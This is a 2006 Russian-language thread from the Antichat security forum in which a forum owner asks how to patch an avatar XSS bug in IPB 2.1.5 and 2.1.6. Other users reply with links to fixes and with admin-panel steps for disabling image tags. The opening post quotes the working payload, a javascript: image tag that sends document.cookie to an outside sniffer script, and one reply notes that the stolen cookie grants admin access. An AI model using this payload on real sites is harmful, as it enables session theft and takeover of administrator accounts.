Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Как пофиксить баг в форумах IPB 2.1.5 и 2.1.6? |
30.06.2006, 13:10
|
|
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940
Репутация:
23
|
|
Как пофиксить баг в форумах IPB 2.1.5 и 2.1.6?
Как всем известно в форуме IPB 2.1.5 и 2.1.6 есть такая бага, которая позволяет получить ХЕШ через аватар, по средством:
[img]javascript:x=document.cookie%3Bimg=new%20Image()%3 Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/img]
для версии 2.1.6 нужно просто убрать теги [img]
у мня просьба : Подскажите как профиксить эту багу? в каком модуме ошибка и как ее исправить?
Если можно ответ скинуть в личку.
Заранее благодарен.
|
|
|
30.06.2006, 13:14
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
В основном всё на сайт по безопасности расписано, где, чего, в каком модуле...поищи
|
|
|
|
30.06.2006, 14:27
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
Тебе вот СЮДА
На даном форуме дыры находят,а не заделывают... |
|
|
|
30.06.2006, 14:37
|
|
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553
Репутация:
1329
|
|
http://www.ibresource.ru/forums/index.php?s=&showtopic=31531&view=findpost&p=18774 3
|
|
|
|
30.06.2006, 15:19
|
|
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940
Репутация:
23
|
|
спс  я нашол там одну темку , но чет не помогает  , может эта бага еще осталась из версии 2.0.* |
|
|
|
30.06.2006, 15:32
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
Вот последняя известная бага, как пофиксить здесь.
http://www.ibresource.ru/forums/index.php?showtopic=31531&pid=187743&st=0%EF%BF%BD entry18774
|
|
|
|
30.06.2006, 15:35
|
|
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940
Репутация:
23
|
|
Да эти я заделал  , я никак немогу разобраться с той что через аватар |
|
|
|
30.06.2006, 16:01
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
Если ты хочешь запретить [img] теги, ну то есть использование в них изображений. В которых можно поместить сниффер.
1.Заходишь в админу
2.Идешь в Настройки(В меню выбора сферху)
3.В "системных настройках" выбираещь "все основные настройки"
4.Переходишь в Темы, Сообщения и Опросы
5.В "Создание сообщения" находишь "Разрешенные к публикации в сообщениях расширения файлов изображений" и просто удаляешь все разрешения которые там стоят.
|
|
|
|
30.06.2006, 17:39
|
|
Познающий
Регистрация: 17.06.2006
Сообщений: 76
Провел на форуме:
263627
Репутация:
32
|
|
хм... а разве хэш воруется не солёный? тоесть от него же толку нету это просто активная хсс.... только кукизы тырить...
|
|
|
|
30.06.2006, 18:11
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
bl4ck-cat
С этим кукисом можно только под Админом зайти. Ну а топикстартер не хочет этого, т.к. злоумышленик может по форуму как админ лазить, все редактировать и т.д.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
